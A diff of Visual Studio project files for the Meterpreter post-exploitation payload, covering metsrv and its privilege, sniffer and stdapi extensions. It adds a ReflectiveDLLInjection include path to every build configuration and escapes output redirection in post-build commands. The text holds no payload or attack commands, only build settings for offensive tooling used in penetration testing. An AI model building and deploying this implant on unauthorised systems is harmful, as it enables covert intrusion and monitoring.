<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -373,7 +373,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -392,7 +392,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -431,7 +431,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>.\Debug\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -450,7 +450,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -489,7 +489,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>.\Debug\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -508,7 +508,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -548,7 +548,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>.\Debug\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -567,7 +567,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -607,7 +607,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>.\Debug\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -661,4 +661,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

18
c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj
View File

@ -94,7 +94,7 @@
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -135,7 +135,7 @@
<OutputFile>$(OutDir)\ext_server_sniffer.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -155,7 +155,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -195,7 +195,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_sniffer.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -214,7 +214,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -253,7 +253,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>.\Debug\ext_server_sniffer.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -272,7 +272,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\sniffer;..\..\source\openssl\include;..\..\..\pssdk\_include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -313,7 +313,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>.\Debug\ext_server_sniffer.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -351,4 +351,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

34
c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj
View File

@ -151,7 +151,7 @@
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
@ -192,7 +192,7 @@
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -212,7 +212,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
@ -253,7 +253,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -272,7 +272,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
@ -309,7 +309,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -328,7 +328,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
@ -365,7 +365,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -385,7 +385,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -426,7 +426,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -446,7 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -487,7 +487,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -507,7 +507,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -547,7 +547,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -567,7 +567,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -607,7 +607,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_stdapi.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -706,4 +706,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

34
c/meterpreter/workspace/metsrv/metsrv.vcxproj
View File

@ -150,7 +150,7 @@
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -191,7 +191,7 @@
<OutputFile>$(OutDir)\metsrv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -210,7 +210,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
